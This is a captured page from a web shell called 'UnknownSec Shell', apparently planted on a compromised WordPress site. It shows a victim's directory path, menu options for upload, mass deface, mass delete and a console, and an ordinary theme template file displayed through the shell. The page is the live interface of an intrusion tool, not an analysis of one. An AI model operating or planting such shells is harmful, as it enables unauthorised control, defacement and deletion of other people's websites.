shell bypass 403
UnknownSec Shell
:
/
home
/
akwariom
/
www
/
wp-content
/
themes
/
zillah
/
template-parts
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
content-none.php
<?php /** * Template part for displaying a message that posts cannot be found. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package zillah */ ?> <section class="no-results not-found"> <div class="content-inner-wrap""> <header class="page-header-search-nothing"> <h1 class="page-title search-nothing-found"><?php esc_html_e( 'Sorry, nothing found!', 'zillah' ); ?></h1> </header><!-- .page-header --> <div class="page-content page-content-search"> <?php if ( is_home() && current_user_can( 'publish_posts' ) ) { ?> <p> <?php printf( wp_kses( /* translators: 1: link to new post */ __( 'Ready to publish your first post? <a href="%1$s">Get started here</a>.', 'zillah' ), array( 'a' => array( 'href' => array(), ), ) ), esc_url( admin_url( 'post-new.php' ) ) ); ?> </p> <?php } elseif ( is_search() ) { ?> <p><?php esc_html_e( 'Sorry, but nothing matched your search terms. Please try again with some different keywords.', 'zillah' ); ?></p> <?php get_search_form(); } else { ?> <p><?php esc_html_e( 'It seems we can’t find what you’re looking for. Perhaps searching can help.', 'zillah' ); ?></p> <?php get_search_form(); } ?> </div><!-- .page-content --> </div> </section><!-- .no-results -->
© 2026 UnknownSec